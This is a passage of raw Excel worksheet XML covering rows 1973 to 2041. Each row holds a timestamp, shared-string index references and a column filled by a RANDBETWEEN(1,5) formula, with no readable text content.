      <c r="B1973" t="s">
        <v>19</v>
      </c>
      <c r="C1973" t="s">
        <v>10</v>
      </c>
      <c r="D1973" t="s">
        <v>46</v>
      </c>
      <c r="E1973" s="2" t="s">
        <v>2022</v>
      </c>
      <c r="F1973">
        <f t="shared" ca="1" si="30"/>
        <v>1</v>
      </c>
    </row>
    <row r="1974" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1974" s="1">
        <v>43521.736273148148</v>
      </c>
      <c r="B1974" t="s">
        <v>19</v>
      </c>
      <c r="C1974" t="s">
        <v>10</v>
      </c>
      <c r="D1974" t="s">
        <v>6</v>
      </c>
      <c r="E1974" t="s">
        <v>2023</v>
      </c>
      <c r="F1974">
        <f t="shared" ca="1" si="30"/>
        <v>5</v>
      </c>
    </row>
    <row r="1975" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A1975" s="1">
        <v>43521.718344907407</v>
      </c>
      <c r="B1975" t="s">
        <v>13</v>
      </c>
      <c r="C1975" t="s">
        <v>140</v>
      </c>
      <c r="D1975" t="s">
        <v>141</v>
      </c>
      <c r="E1975" s="2" t="s">
        <v>2024</v>
      </c>
      <c r="F1975">
        <f t="shared" ca="1" si="30"/>
        <v>2</v>
      </c>
    </row>
    <row r="1976" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A1976" s="1">
        <v>43521.699097222219</v>
      </c>
      <c r="B1976" t="s">
        <v>19</v>
      </c>
      <c r="C1976" t="s">
        <v>10</v>
      </c>
      <c r="D1976" t="s">
        <v>158</v>
      </c>
      <c r="E1976" s="2" t="s">
        <v>2025</v>
      </c>
      <c r="F1976">
        <f t="shared" ca="1" si="30"/>
        <v>5</v>
      </c>
    </row>
    <row r="1977" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A1977" s="1">
        <v>43521.68074074074</v>
      </c>
      <c r="B1977" t="s">
        <v>19</v>
      </c>
      <c r="C1977" t="s">
        <v>10</v>
      </c>
      <c r="D1977" t="s">
        <v>330</v>
      </c>
      <c r="E1977" s="2" t="s">
        <v>2026</v>
      </c>
      <c r="F1977">
        <f t="shared" ca="1" si="30"/>
        <v>5</v>
      </c>
    </row>
    <row r="1978" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1978" s="1">
        <v>43521.672951388886</v>
      </c>
      <c r="B1978" t="s">
        <v>13</v>
      </c>
      <c r="C1978" t="s">
        <v>10</v>
      </c>
      <c r="D1978" t="s">
        <v>17</v>
      </c>
      <c r="E1978" t="s">
        <v>2027</v>
      </c>
      <c r="F1978">
        <f t="shared" ca="1" si="30"/>
        <v>2</v>
      </c>
    </row>
    <row r="1979" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1979" s="1">
        <v>43521.667291666665</v>
      </c>
      <c r="B1979" t="s">
        <v>13</v>
      </c>
      <c r="C1979" t="s">
        <v>10</v>
      </c>
      <c r="D1979" t="s">
        <v>14</v>
      </c>
      <c r="E1979" t="s">
        <v>2028</v>
      </c>
      <c r="F1979">
        <f t="shared" ca="1" si="30"/>
        <v>4</v>
      </c>
    </row>
    <row r="1980" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A1980" s="1">
        <v>43521.665347222224</v>
      </c>
      <c r="B1980" t="s">
        <v>19</v>
      </c>
      <c r="C1980" t="s">
        <v>776</v>
      </c>
      <c r="D1980" t="s">
        <v>23</v>
      </c>
      <c r="E1980" s="2" t="s">
        <v>2029</v>
      </c>
      <c r="F1980">
        <f t="shared" ca="1" si="30"/>
        <v>1</v>
      </c>
    </row>
    <row r="1981" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1981" s="1">
        <v>43521.663726851853</v>
      </c>
      <c r="B1981" t="s">
        <v>19</v>
      </c>
      <c r="C1981" t="s">
        <v>6</v>
      </c>
      <c r="D1981" t="s">
        <v>25</v>
      </c>
      <c r="E1981" t="s">
        <v>2030</v>
      </c>
      <c r="F1981">
        <f t="shared" ca="1" si="30"/>
        <v>4</v>
      </c>
    </row>
    <row r="1982" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A1982" s="1">
        <v>43521.659768518519</v>
      </c>
      <c r="B1982" t="s">
        <v>13</v>
      </c>
      <c r="C1982" t="s">
        <v>10</v>
      </c>
      <c r="D1982" t="s">
        <v>6</v>
      </c>
      <c r="E1982" s="2" t="s">
        <v>2031</v>
      </c>
      <c r="F1982">
        <f t="shared" ca="1" si="30"/>
        <v>2</v>
      </c>
    </row>
    <row r="1983" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1983" s="1">
        <v>43521.656145833331</v>
      </c>
      <c r="B1983" t="s">
        <v>19</v>
      </c>
      <c r="C1983" t="s">
        <v>10</v>
      </c>
      <c r="D1983" t="s">
        <v>17</v>
      </c>
      <c r="E1983" t="s">
        <v>2032</v>
      </c>
      <c r="F1983">
        <f t="shared" ca="1" si="30"/>
        <v>5</v>
      </c>
    </row>
    <row r="1984" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1984" s="1">
        <v>43521.640833333331</v>
      </c>
      <c r="B1984" t="s">
        <v>13</v>
      </c>
      <c r="C1984" t="s">
        <v>10</v>
      </c>
      <c r="D1984" t="s">
        <v>14</v>
      </c>
      <c r="E1984" t="s">
        <v>2033</v>
      </c>
      <c r="F1984">
        <f t="shared" ca="1" si="30"/>
        <v>3</v>
      </c>
    </row>
    <row r="1985" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A1985" s="1">
        <v>43521.625844907408</v>
      </c>
      <c r="B1985" t="s">
        <v>13</v>
      </c>
      <c r="C1985" t="s">
        <v>10</v>
      </c>
      <c r="D1985" t="s">
        <v>52</v>
      </c>
      <c r="E1985" s="2" t="s">
        <v>2034</v>
      </c>
      <c r="F1985">
        <f t="shared" ca="1" si="30"/>
        <v>1</v>
      </c>
    </row>
    <row r="1986" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1986" s="1">
        <v>43521.625208333331</v>
      </c>
      <c r="B1986" t="s">
        <v>35</v>
      </c>
      <c r="C1986" t="s">
        <v>10</v>
      </c>
      <c r="D1986" t="s">
        <v>271</v>
      </c>
      <c r="E1986" t="s">
        <v>2035</v>
      </c>
      <c r="F1986">
        <f t="shared" ref="F1986:F2049" ca="1" si="31">RANDBETWEEN(1,5)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1987" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1987" s="1">
        <v>43521.593055555553</v>
      </c>
      <c r="B1987" t="s">
        <v>5</v>
      </c>
      <c r="C1987" t="s">
        <v>10</v>
      </c>
      <c r="D1987" t="s">
        <v>23</v>
      </c>
      <c r="E1987" t="s">
        <v>2036</v>
      </c>
      <c r="F1987">
        <f t="shared" ca="1" si="31"/>
        <v>1</v>
      </c>
    </row>
    <row r="1988" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1988" s="1">
        <v>43521.589398148149</v>
      </c>
      <c r="B1988" t="s">
        <v>5</v>
      </c>
      <c r="C1988" t="s">
        <v>10</v>
      </c>
      <c r="D1988" t="s">
        <v>46</v>
      </c>
      <c r="E1988" t="s">
        <v>2037</v>
      </c>
      <c r="F1988">
        <f t="shared" ca="1" si="31"/>
        <v>2</v>
      </c>
    </row>
    <row r="1989" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A1989" s="1">
        <v>43521.579780092594</v>
      </c>
      <c r="B1989" t="s">
        <v>5</v>
      </c>
      <c r="C1989" t="s">
        <v>10</v>
      </c>
      <c r="D1989" t="s">
        <v>20</v>
      </c>
      <c r="E1989" s="2" t="s">
        <v>2038</v>
      </c>
      <c r="F1989">
        <f t="shared" ca="1" si="31"/>
        <v>1</v>
      </c>
    </row>
    <row r="1990" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A1990" s="1">
        <v>43521.5700462963</v>
      </c>
      <c r="B1990" t="s">
        <v>35</v>
      </c>
      <c r="C1990" t="s">
        <v>10</v>
      </c>
      <c r="D1990" t="s">
        <v>52</v>
      </c>
      <c r="E1990" s="2" t="s">
        <v>2039</v>
      </c>
      <c r="F1990">
        <f t="shared" ca="1" si="31"/>
        <v>1</v>
      </c>
    </row>
    <row r="1991" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1991" s="1">
        <v>43521.558078703703</v>
      </c>
      <c r="B1991" t="s">
        <v>13</v>
      </c>
      <c r="C1991" t="s">
        <v>260</v>
      </c>
      <c r="E1991" t="s">
        <v>2040</v>
      </c>
      <c r="F1991">
        <f t="shared" ca="1" si="31"/>
        <v>3</v>
      </c>
    </row>
    <row r="1992" spans="1:6" ht="315" x14ac:dyDescent="0.25">
      <c r="A1992" s="1">
        <v>43521.543206018519</v>
      </c>
      <c r="B1992" t="s">
        <v>5</v>
      </c>
      <c r="C1992" t="s">
        <v>6</v>
      </c>
      <c r="D1992" t="s">
        <v>194</v>
      </c>
      <c r="E1992" s="2" t="s">
        <v>2041</v>
      </c>
      <c r="F1992">
        <f t="shared" ca="1" si="31"/>
        <v>4</v>
      </c>
    </row>
    <row r="1993" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1993" s="1">
        <v>43521.528692129628</v>
      </c>
      <c r="B1993" t="s">
        <v>5</v>
      </c>
      <c r="C1993" t="s">
        <v>10</v>
      </c>
      <c r="D1993" t="s">
        <v>251</v>
      </c>
      <c r="F1993">
        <f t="shared" ca="1" si="31"/>
        <v>5</v>
      </c>
    </row>
    <row r="1994" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1994" s="1">
        <v>43521.524317129632</v>
      </c>
      <c r="B1994" t="s">
        <v>5</v>
      </c>
      <c r="C1994" t="s">
        <v>10</v>
      </c>
      <c r="D1994" t="s">
        <v>23</v>
      </c>
      <c r="E1994" t="s">
        <v>28</v>
      </c>
      <c r="F1994">
        <f t="shared" ca="1" si="31"/>
        <v>5</v>
      </c>
    </row>
    <row r="1995" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A1995" s="1">
        <v>43521.514872685184</v>
      </c>
      <c r="B1995" t="s">
        <v>19</v>
      </c>
      <c r="C1995" t="s">
        <v>10</v>
      </c>
      <c r="D1995" t="s">
        <v>6</v>
      </c>
      <c r="E1995" s="2" t="s">
        <v>2042</v>
      </c>
      <c r="F1995">
        <f t="shared" ca="1" si="31"/>
        <v>1</v>
      </c>
    </row>
    <row r="1996" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1996" s="1">
        <v>43521.514675925922</v>
      </c>
      <c r="B1996" t="s">
        <v>19</v>
      </c>
      <c r="C1996" t="s">
        <v>10</v>
      </c>
      <c r="D1996" t="s">
        <v>163</v>
      </c>
      <c r="E1996" t="s">
        <v>2043</v>
      </c>
      <c r="F1996">
        <f t="shared" ca="1" si="31"/>
        <v>2</v>
      </c>
    </row>
    <row r="1997" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A1997" s="1">
        <v>43521.514004629629</v>
      </c>
      <c r="B1997" t="s">
        <v>5</v>
      </c>
      <c r="C1997" t="s">
        <v>10</v>
      </c>
      <c r="D1997" t="s">
        <v>36</v>
      </c>
      <c r="E1997" s="2" t="s">
        <v>2044</v>
      </c>
      <c r="F1997">
        <f t="shared" ca="1" si="31"/>
        <v>1</v>
      </c>
    </row>
    <row r="1998" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A1998" s="1">
        <v>43521.509641203702</v>
      </c>
      <c r="B1998" t="s">
        <v>13</v>
      </c>
      <c r="C1998" t="s">
        <v>344</v>
      </c>
      <c r="E1998" s="2" t="s">
        <v>2045</v>
      </c>
      <c r="F1998">
        <f t="shared" ca="1" si="31"/>
        <v>1</v>
      </c>
    </row>
    <row r="1999" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A1999" s="1">
        <v>43521.496365740742</v>
      </c>
      <c r="B1999" t="s">
        <v>19</v>
      </c>
      <c r="C1999" t="s">
        <v>6</v>
      </c>
      <c r="D1999" t="s">
        <v>114</v>
      </c>
      <c r="E1999" s="2" t="s">
        <v>2046</v>
      </c>
      <c r="F1999">
        <f t="shared" ca="1" si="31"/>
        <v>3</v>
      </c>
    </row>
    <row r="2000" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2000" s="1">
        <v>43521.482187499998</v>
      </c>
      <c r="B2000" t="s">
        <v>13</v>
      </c>
      <c r="C2000" t="s">
        <v>260</v>
      </c>
      <c r="D2000" t="s">
        <v>312</v>
      </c>
      <c r="E2000" t="s">
        <v>2047</v>
      </c>
      <c r="F2000">
        <f t="shared" ca="1" si="31"/>
        <v>3</v>
      </c>
    </row>
    <row r="2001" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A2001" s="1">
        <v>43521.47991898148</v>
      </c>
      <c r="B2001" t="s">
        <v>5</v>
      </c>
      <c r="C2001" t="s">
        <v>48</v>
      </c>
      <c r="E2001" s="2" t="s">
        <v>2048</v>
      </c>
      <c r="F2001">
        <f t="shared" ca="1" si="31"/>
        <v>5</v>
      </c>
    </row>
    <row r="2002" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2002" s="1">
        <v>43521.46565972222</v>
      </c>
      <c r="B2002" t="s">
        <v>19</v>
      </c>
      <c r="C2002" t="s">
        <v>10</v>
      </c>
      <c r="D2002" t="s">
        <v>80</v>
      </c>
      <c r="E2002" t="s">
        <v>2049</v>
      </c>
      <c r="F2002">
        <f t="shared" ca="1" si="31"/>
        <v>5</v>
      </c>
    </row>
    <row r="2003" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2003" s="1">
        <v>43521.448692129627</v>
      </c>
      <c r="B2003" t="s">
        <v>5</v>
      </c>
      <c r="C2003" t="s">
        <v>10</v>
      </c>
      <c r="D2003" t="s">
        <v>271</v>
      </c>
      <c r="E2003" t="s">
        <v>2050</v>
      </c>
      <c r="F2003">
        <f t="shared" ca="1" si="31"/>
        <v>2</v>
      </c>
    </row>
    <row r="2004" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A2004" s="1">
        <v>43521.448298611111</v>
      </c>
      <c r="B2004" t="s">
        <v>5</v>
      </c>
      <c r="C2004" t="s">
        <v>29</v>
      </c>
      <c r="E2004" s="2" t="s">
        <v>2051</v>
      </c>
      <c r="F2004">
        <f t="shared" ca="1" si="31"/>
        <v>4</v>
      </c>
    </row>
    <row r="2005" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2005" s="1">
        <v>43521.429502314815</v>
      </c>
      <c r="B2005" t="s">
        <v>5</v>
      </c>
      <c r="C2005" t="s">
        <v>10</v>
      </c>
      <c r="D2005" t="s">
        <v>112</v>
      </c>
      <c r="E2005" t="s">
        <v>2052</v>
      </c>
      <c r="F2005">
        <f t="shared" ca="1" si="31"/>
        <v>2</v>
      </c>
    </row>
    <row r="2006" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A2006" s="1">
        <v>43521.429143518515</v>
      </c>
      <c r="B2006" t="s">
        <v>13</v>
      </c>
      <c r="C2006" t="s">
        <v>10</v>
      </c>
      <c r="D2006" t="s">
        <v>20</v>
      </c>
      <c r="E2006" s="2" t="s">
        <v>2053</v>
      </c>
      <c r="F2006">
        <f t="shared" ca="1" si="31"/>
        <v>2</v>
      </c>
    </row>
    <row r="2007" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2007" s="1">
        <v>43521.428182870368</v>
      </c>
      <c r="B2007" t="s">
        <v>5</v>
      </c>
      <c r="C2007" t="s">
        <v>10</v>
      </c>
      <c r="D2007" t="s">
        <v>89</v>
      </c>
      <c r="E2007" t="s">
        <v>2054</v>
      </c>
      <c r="F2007">
        <f t="shared" ca="1" si="31"/>
        <v>3</v>
      </c>
    </row>
    <row r="2008" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2008" s="1">
        <v>43521.425729166665</v>
      </c>
      <c r="B2008" t="s">
        <v>35</v>
      </c>
      <c r="C2008" t="s">
        <v>10</v>
      </c>
      <c r="D2008" t="s">
        <v>56</v>
      </c>
      <c r="E2008" t="s">
        <v>2055</v>
      </c>
      <c r="F2008">
        <f t="shared" ca="1" si="31"/>
        <v>5</v>
      </c>
    </row>
    <row r="2009" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2009" s="1">
        <v>43521.42528935185</v>
      </c>
      <c r="B2009" t="s">
        <v>5</v>
      </c>
      <c r="C2009" t="s">
        <v>10</v>
      </c>
      <c r="D2009" t="s">
        <v>271</v>
      </c>
      <c r="E2009" t="s">
        <v>2056</v>
      </c>
      <c r="F2009">
        <f t="shared" ca="1" si="31"/>
        <v>5</v>
      </c>
    </row>
    <row r="2010" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2010" s="1">
        <v>43521.409236111111</v>
      </c>
      <c r="B2010" t="s">
        <v>19</v>
      </c>
      <c r="C2010" t="s">
        <v>48</v>
      </c>
      <c r="E2010" t="s">
        <v>2057</v>
      </c>
      <c r="F2010">
        <f t="shared" ca="1" si="31"/>
        <v>4</v>
      </c>
    </row>
    <row r="2011" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2011" s="1">
        <v>43521.394953703704</v>
      </c>
      <c r="B2011" t="s">
        <v>13</v>
      </c>
      <c r="C2011" t="s">
        <v>10</v>
      </c>
      <c r="D2011" t="s">
        <v>817</v>
      </c>
      <c r="E2011" t="s">
        <v>2058</v>
      </c>
      <c r="F2011">
        <f t="shared" ca="1" si="31"/>
        <v>3</v>
      </c>
    </row>
    <row r="2012" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A2012" s="1">
        <v>43521.371747685182</v>
      </c>
      <c r="B2012" t="s">
        <v>5</v>
      </c>
      <c r="C2012" t="s">
        <v>71</v>
      </c>
      <c r="E2012" s="2" t="s">
        <v>2059</v>
      </c>
      <c r="F2012">
        <f t="shared" ca="1" si="31"/>
        <v>5</v>
      </c>
    </row>
    <row r="2013" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A2013" s="1">
        <v>43521.364027777781</v>
      </c>
      <c r="B2013" t="s">
        <v>35</v>
      </c>
      <c r="C2013" t="s">
        <v>65</v>
      </c>
      <c r="E2013" s="2" t="s">
        <v>2060</v>
      </c>
      <c r="F2013">
        <f t="shared" ca="1" si="31"/>
        <v>3</v>
      </c>
    </row>
    <row r="2014" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2014" s="1">
        <v>43521.361620370371</v>
      </c>
      <c r="B2014" t="s">
        <v>5</v>
      </c>
      <c r="C2014" t="s">
        <v>10</v>
      </c>
      <c r="D2014" t="s">
        <v>263</v>
      </c>
      <c r="E2014" t="s">
        <v>2061</v>
      </c>
      <c r="F2014">
        <f t="shared" ca="1" si="31"/>
        <v>4</v>
      </c>
    </row>
    <row r="2015" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2015" s="1">
        <v>43521.350277777776</v>
      </c>
      <c r="B2015" t="s">
        <v>5</v>
      </c>
      <c r="C2015" t="s">
        <v>559</v>
      </c>
      <c r="E2015" t="s">
        <v>2062</v>
      </c>
      <c r="F2015">
        <f t="shared" ca="1" si="31"/>
        <v>5</v>
      </c>
    </row>
    <row r="2016" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2016" s="1">
        <v>43521.343136574076</v>
      </c>
      <c r="B2016" t="s">
        <v>5</v>
      </c>
      <c r="C2016" t="s">
        <v>559</v>
      </c>
      <c r="E2016" t="s">
        <v>2063</v>
      </c>
      <c r="F2016">
        <f t="shared" ca="1" si="31"/>
        <v>5</v>
      </c>
    </row>
    <row r="2017" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2017" s="1">
        <v>43521.328761574077</v>
      </c>
      <c r="B2017" t="s">
        <v>1305</v>
      </c>
      <c r="C2017" t="s">
        <v>559</v>
      </c>
      <c r="E2017" t="s">
        <v>2064</v>
      </c>
      <c r="F2017">
        <f t="shared" ca="1" si="31"/>
        <v>3</v>
      </c>
    </row>
    <row r="2018" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A2018" s="1">
        <v>43521.320173611108</v>
      </c>
      <c r="B2018" t="s">
        <v>35</v>
      </c>
      <c r="C2018" t="s">
        <v>623</v>
      </c>
      <c r="E2018" s="2" t="s">
        <v>2065</v>
      </c>
      <c r="F2018">
        <f t="shared" ca="1" si="31"/>
        <v>5</v>
      </c>
    </row>
    <row r="2019" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A2019" s="1">
        <v>43521.314409722225</v>
      </c>
      <c r="B2019" t="s">
        <v>5</v>
      </c>
      <c r="C2019" t="s">
        <v>10</v>
      </c>
      <c r="D2019" t="s">
        <v>36</v>
      </c>
      <c r="E2019" s="2" t="s">
        <v>2066</v>
      </c>
      <c r="F2019">
        <f t="shared" ca="1" si="31"/>
        <v>5</v>
      </c>
    </row>
    <row r="2020" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A2020" s="1">
        <v>43521.3046875</v>
      </c>
      <c r="B2020" t="s">
        <v>19</v>
      </c>
      <c r="C2020" t="s">
        <v>45</v>
      </c>
      <c r="E2020" s="2" t="s">
        <v>2067</v>
      </c>
      <c r="F2020">
        <f t="shared" ca="1" si="31"/>
        <v>2</v>
      </c>
    </row>
    <row r="2021" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2021" s="1">
        <v>43521.297962962963</v>
      </c>
      <c r="B2021" t="s">
        <v>19</v>
      </c>
      <c r="C2021" t="s">
        <v>41</v>
      </c>
      <c r="E2021" t="s">
        <v>2068</v>
      </c>
      <c r="F2021">
        <f t="shared" ca="1" si="31"/>
        <v>2</v>
      </c>
    </row>
    <row r="2022" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A2022" s="1">
        <v>43521.253483796296</v>
      </c>
      <c r="B2022" t="s">
        <v>5</v>
      </c>
      <c r="C2022" t="s">
        <v>41</v>
      </c>
      <c r="E2022" s="2" t="s">
        <v>2069</v>
      </c>
      <c r="F2022">
        <f t="shared" ca="1" si="31"/>
        <v>1</v>
      </c>
    </row>
    <row r="2023" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2023" s="1">
        <v>43521.248298611114</v>
      </c>
      <c r="B2023" t="s">
        <v>19</v>
      </c>
      <c r="C2023" t="s">
        <v>124</v>
      </c>
      <c r="E2023" t="s">
        <v>2070</v>
      </c>
      <c r="F2023">
        <f t="shared" ca="1" si="31"/>
        <v>1</v>
      </c>
    </row>
    <row r="2024" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A2024" s="1">
        <v>43521.233680555553</v>
      </c>
      <c r="B2024" t="s">
        <v>35</v>
      </c>
      <c r="C2024" t="s">
        <v>65</v>
      </c>
      <c r="E2024" s="2" t="s">
        <v>2071</v>
      </c>
      <c r="F2024">
        <f t="shared" ca="1" si="31"/>
        <v>2</v>
      </c>
    </row>
    <row r="2025" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A2025" s="1">
        <v>43521.219363425924</v>
      </c>
      <c r="B2025" t="s">
        <v>5</v>
      </c>
      <c r="C2025" t="s">
        <v>41</v>
      </c>
      <c r="E2025" s="2" t="s">
        <v>2072</v>
      </c>
      <c r="F2025">
        <f t="shared" ca="1" si="31"/>
        <v>1</v>
      </c>
    </row>
    <row r="2026" spans="1:6" ht="360" x14ac:dyDescent="0.25">
      <c r="A2026" s="1">
        <v>43521.178715277776</v>
      </c>
      <c r="B2026" t="s">
        <v>5</v>
      </c>
      <c r="C2026" t="s">
        <v>41</v>
      </c>
      <c r="E2026" s="2" t="s">
        <v>2073</v>
      </c>
      <c r="F2026">
        <f t="shared" ca="1" si="31"/>
        <v>4</v>
      </c>
    </row>
    <row r="2027" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A2027" s="1">
        <v>43521.175219907411</v>
      </c>
      <c r="B2027" t="s">
        <v>19</v>
      </c>
      <c r="C2027" t="s">
        <v>71</v>
      </c>
      <c r="E2027" s="2" t="s">
        <v>2074</v>
      </c>
      <c r="F2027">
        <f t="shared" ca="1" si="31"/>
        <v>2</v>
      </c>
    </row>
    <row r="2028" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A2028" s="1">
        <v>43521.152129629627</v>
      </c>
      <c r="B2028" t="s">
        <v>5</v>
      </c>
      <c r="C2028" t="s">
        <v>65</v>
      </c>
      <c r="E2028" s="2" t="s">
        <v>2075</v>
      </c>
      <c r="F2028">
        <f t="shared" ca="1" si="31"/>
        <v>2</v>
      </c>
    </row>
    <row r="2029" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2029" s="1">
        <v>43521.143796296295</v>
      </c>
      <c r="B2029" t="s">
        <v>5</v>
      </c>
      <c r="C2029" t="s">
        <v>253</v>
      </c>
      <c r="E2029" t="s">
        <v>2076</v>
      </c>
      <c r="F2029">
        <f t="shared" ca="1" si="31"/>
        <v>2</v>
      </c>
    </row>
    <row r="2030" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A2030" s="1">
        <v>43521.133935185186</v>
      </c>
      <c r="B2030" t="s">
        <v>35</v>
      </c>
      <c r="C2030" t="s">
        <v>454</v>
      </c>
      <c r="E2030" s="2" t="s">
        <v>2077</v>
      </c>
      <c r="F2030">
        <f t="shared" ca="1" si="31"/>
        <v>5</v>
      </c>
    </row>
    <row r="2031" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A2031" s="1">
        <v>43521.128912037035</v>
      </c>
      <c r="B2031" t="s">
        <v>5</v>
      </c>
      <c r="C2031" t="s">
        <v>103</v>
      </c>
      <c r="E2031" s="2" t="s">
        <v>2078</v>
      </c>
      <c r="F2031">
        <f t="shared" ca="1" si="31"/>
        <v>4</v>
      </c>
    </row>
    <row r="2032" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A2032" s="1">
        <v>43521.1171875</v>
      </c>
      <c r="B2032" t="s">
        <v>35</v>
      </c>
      <c r="C2032" t="s">
        <v>471</v>
      </c>
      <c r="E2032" s="2" t="s">
        <v>2079</v>
      </c>
      <c r="F2032">
        <f t="shared" ca="1" si="31"/>
        <v>5</v>
      </c>
    </row>
    <row r="2033" spans="1:6" ht="330" x14ac:dyDescent="0.25">
      <c r="A2033" s="1">
        <v>43521.108518518522</v>
      </c>
      <c r="B2033" t="s">
        <v>13</v>
      </c>
      <c r="C2033" t="s">
        <v>43</v>
      </c>
      <c r="E2033" s="2" t="s">
        <v>2080</v>
      </c>
      <c r="F2033">
        <f t="shared" ca="1" si="31"/>
        <v>2</v>
      </c>
    </row>
    <row r="2034" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2034" s="1">
        <v>43521.09778935185</v>
      </c>
      <c r="B2034" t="s">
        <v>1305</v>
      </c>
      <c r="C2034" t="s">
        <v>41</v>
      </c>
      <c r="E2034" t="s">
        <v>2081</v>
      </c>
      <c r="F2034">
        <f t="shared" ca="1" si="31"/>
        <v>1</v>
      </c>
    </row>
    <row r="2035" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A2035" s="1">
        <v>43521.086087962962</v>
      </c>
      <c r="B2035" t="s">
        <v>35</v>
      </c>
      <c r="C2035" t="s">
        <v>2082</v>
      </c>
      <c r="E2035" s="2" t="s">
        <v>2083</v>
      </c>
      <c r="F2035">
        <f t="shared" ca="1" si="31"/>
        <v>4</v>
      </c>
    </row>
    <row r="2036" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A2036" s="1">
        <v>43521.037395833337</v>
      </c>
      <c r="B2036" t="s">
        <v>19</v>
      </c>
      <c r="C2036" t="s">
        <v>140</v>
      </c>
      <c r="D2036" t="s">
        <v>234</v>
      </c>
      <c r="E2036" s="2" t="s">
        <v>2084</v>
      </c>
      <c r="F2036">
        <f t="shared" ca="1" si="31"/>
        <v>1</v>
      </c>
    </row>
    <row r="2037" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A2037" s="1">
        <v>43520.999340277776</v>
      </c>
      <c r="B2037" t="s">
        <v>1305</v>
      </c>
      <c r="C2037" t="s">
        <v>73</v>
      </c>
      <c r="E2037" s="2" t="s">
        <v>2085</v>
      </c>
      <c r="F2037">
        <f t="shared" ca="1" si="31"/>
        <v>2</v>
      </c>
    </row>
    <row r="2038" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A2038" s="1">
        <v>43520.694201388891</v>
      </c>
      <c r="B2038" t="s">
        <v>5</v>
      </c>
      <c r="C2038" t="s">
        <v>6</v>
      </c>
      <c r="D2038" t="s">
        <v>25</v>
      </c>
      <c r="E2038" s="2" t="s">
        <v>2086</v>
      </c>
      <c r="F2038">
        <f t="shared" ca="1" si="31"/>
        <v>4</v>
      </c>
    </row>
    <row r="2039" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2039" s="1">
        <v>43520.475081018521</v>
      </c>
      <c r="B2039" t="s">
        <v>13</v>
      </c>
      <c r="C2039" t="s">
        <v>6</v>
      </c>
      <c r="D2039" t="s">
        <v>821</v>
      </c>
      <c r="E2039" t="s">
        <v>2087</v>
      </c>
      <c r="F2039">
        <f t="shared" ca="1" si="31"/>
        <v>4</v>
      </c>
    </row>
    <row r="2040" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2040" s="1">
        <v>43520.433506944442</v>
      </c>
      <c r="B2040" t="s">
        <v>19</v>
      </c>
      <c r="C2040" t="s">
        <v>461</v>
      </c>
      <c r="E2040" t="s">
        <v>2088</v>
      </c>
      <c r="F2040">
        <f t="shared" ca="1" si="31"/>
        <v>5</v>
      </c>
    </row>
    <row r="2041" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2041" s="1">
        <v>43520.387164351851</v>
      </c>
      <c r="B2041" t="s">
        <v>5</v>
      </c>
      <c r="C2041" t="s">
        <v>41</v>
